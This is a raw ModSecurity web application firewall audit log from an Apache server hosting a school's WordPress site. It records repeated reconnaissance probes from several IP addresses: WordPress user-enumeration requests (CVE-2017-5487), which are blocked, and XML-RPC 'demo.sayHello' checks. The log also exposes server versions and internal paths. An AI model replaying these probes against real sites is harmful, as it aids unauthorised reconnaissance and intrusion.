Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d55ec074-Z-- --aa44fb04-A-- [09/May/2025:00:53:02 +0700] aBzvfsP9GxxPAbCroFZCGgAAAEc 103.236.140.4 52814 103.236.140.4 8181 --aa44fb04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aa44fb04-C-- demo.sayHello --aa44fb04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa44fb04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746726782730623 5713 (- - -) Stopwatch2: 1746726782730623 5713; combined=4231, p1=574, p2=3434, p3=33, p4=35, p5=92, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa44fb04-Z-- --39f3fe42-A-- [09/May/2025:00:53:44 +0700] aBzvqKcs1DvJ_HgMHE95YwAAABQ 103.236.140.4 52818 103.236.140.4 8181 --39f3fe42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --39f3fe42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39f3fe42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746726824772378 2991 (- - -) Stopwatch2: 1746726824772378 2991; combined=1350, p1=445, p2=874, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39f3fe42-Z-- --ed95d85c-A-- [09/May/2025:00:53:47 +0700] aBzvq6cs1DvJ_HgMHE95ZQAAABg 103.236.140.4 52822 103.236.140.4 8181 --ed95d85c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ed95d85c-C-- demo.sayHello --ed95d85c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed95d85c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746726827545992 4896 (- - -) Stopwatch2: 1746726827545992 4896; combined=3884, p1=468, p2=3214, p3=24, p4=24, p5=91, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed95d85c-Z-- --14fc3d0c-A-- [09/May/2025:00:53:47 +0700] aBzvqys5rYyn3jlLjjIrDwAAAMQ 103.236.140.4 52824 103.236.140.4 8181 --14fc3d0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --14fc3d0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14fc3d0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746726827910898 2248 (- - -) Stopwatch2: 1746726827910898 2248; combined=1053, p1=378, p2=644, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14fc3d0c-Z-- --4125776c-A-- [09/May/2025:00:53:50 +0700] aBzvris5rYyn3jlLjjIrEAAAAMc 103.236.140.4 52830 103.236.140.4 8181 --4125776c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4125776c-C-- demo.sayHello --4125776c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4125776c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746726830681989 4962 (- - -) Stopwatch2: 1746726830681989 4962; combined=3915, p1=482, p2=3239, p3=21, p4=25, p5=87, sr=80, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4125776c-Z-- --58b5870c-A-- [09/May/2025:00:54:36 +0700] aBzv3I4K347NtBcwXKx0vwAAAI8 103.236.140.4 52886 103.236.140.4 8181 --58b5870c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58b5870c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58b5870c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746726876439601 2940 (- - -) Stopwatch2: 1746726876439601 2940; combined=1358, p1=446, p2=881, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58b5870c-Z-- --323b7e6a-A-- [09/May/2025:00:54:40 +0700] aBzv4MP9GxxPAbCroFZCHgAAAEk 103.236.140.4 52896 103.236.140.4 8181 --323b7e6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.79.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.79.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --323b7e6a-C-- demo.sayHello --323b7e6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --323b7e6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746726880254330 6028 (- - -) Stopwatch2: 1746726880254330 6028; combined=4412, p1=555, p2=3623, p3=37, p4=37, p5=95, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --323b7e6a-Z-- --8ad4d54c-A-- [09/May/2025:00:57:44 +0700] aBzwmI4K347NtBcwXKx0wAAAAJg 103.236.140.4 53150 103.236.140.4 8181 --8ad4d54c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8ad4d54c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ad4d54c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746727064491685 2703 (- - -) Stopwatch2: 1746727064491685 2703; combined=1066, p1=376, p2=665, p3=0, p4=0, p5=24, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad4d54c-Z-- --47392a10-A-- [09/May/2025:00:57:47 +0700] aBzwmys5rYyn3jlLjjIrEgAAAMw 103.236.140.4 53158 103.236.140.4 8181 --47392a10-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47392a10-C-- demo.sayHello --47392a10-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47392a10-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746727067594925 6404 (- - -) Stopwatch2: 1746727067594925 6404; combined=4608, p1=655, p2=3711, p3=38, p4=42, p5=98, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47392a10-Z-- --295a1638-A-- [09/May/2025:00:58:00 +0700] aBzwqKcs1DvJ_HgMHE95cAAAAAI 103.236.140.4 53178 103.236.140.4 8181 --295a1638-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --295a1638-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --295a1638-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746727080147402 3153 (- - -) Stopwatch2: 1746727080147402 3153; combined=1362, p1=436, p2=870, p3=0, p4=0, p5=55, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --295a1638-Z-- --b1b44873-A-- [09/May/2025:00:58:02 +0700] aBzwqqcs1DvJ_HgMHE95cQAAAAc 103.236.140.4 53184 103.236.140.4 8181 --b1b44873-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.103 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1b44873-C-- demo.sayHello --b1b44873-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1b44873-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746727082884160 5594 (- - -) Stopwatch2: 1746727082884160 5594; combined=4138, p1=544, p2=3367, p3=34, p4=36, p5=94, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1b44873-Z-- --3ab33167-A-- [09/May/2025:01:01:21 +0700] aBzxcSs5rYyn3jlLjjIrFQAAAMA 103.236.140.4 53478 103.236.140.4 8181 --3ab33167-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ab33167-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ab33167-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746727281282235 2921 (- - -) Stopwatch2: 1746727281282235 2921; combined=1328, p1=436, p2=862, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ab33167-Z-- --5cb81c60-A-- [09/May/2025:01:01:24 +0700] aBzxdKcs1DvJ_HgMHE95eAAAAA8 103.236.140.4 53482 103.236.140.4 8181 --5cb81c60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5cb81c60-C-- demo.sayHello --5cb81c60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cb81c60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746727284230611 5453 (- - -) Stopwatch2: 1746727284230611 5453; combined=4087, p1=532, p2=3330, p3=33, p4=33, p5=94, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cb81c60-Z-- --6d04f52d-A-- [09/May/2025:01:02:04 +0700] aBzxnKcs1DvJ_HgMHE95egAAAAw 103.236.140.4 53490 103.236.140.4 8181 --6d04f52d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6d04f52d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d04f52d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746727324291494 3025 (- - -) Stopwatch2: 1746727324291494 3025; combined=1359, p1=455, p2=874, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d04f52d-Z-- --a6f7f370-A-- [09/May/2025:01:02:06 +0700] aBzxnqcs1DvJ_HgMHE95fAAAAAQ 103.236.140.4 53494 103.236.140.4 8181 --a6f7f370-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a6f7f370-C-- demo.sayHello --a6f7f370-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6f7f370-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746727326128708 5357 (- - -) Stopwatch2: 1746727326128708 5357; combined=4078, p1=529, p2=3316, p3=40, p4=32, p5=95, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6f7f370-Z-- --9c720c55-A-- [09/May/2025:01:19:41 +0700] aBz1vcP9GxxPAbCroFZCJAAAAEM 103.236.140.4 53586 103.236.140.4 8181 --9c720c55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.99 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c720c55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c720c55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746728381150700 2877 (- - -) Stopwatch2: 1746728381150700 2877; combined=1334, p1=432, p2=867, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c720c55-Z-- --cfbb0e5f-A-- [09/May/2025:01:19:44 +0700] aBz1wMP9GxxPAbCroFZCJgAAAFc 103.236.140.4 53590 103.236.140.4 8181 --cfbb0e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.99 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.99 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cfbb0e5f-C-- demo.sayHello --cfbb0e5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfbb0e5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag 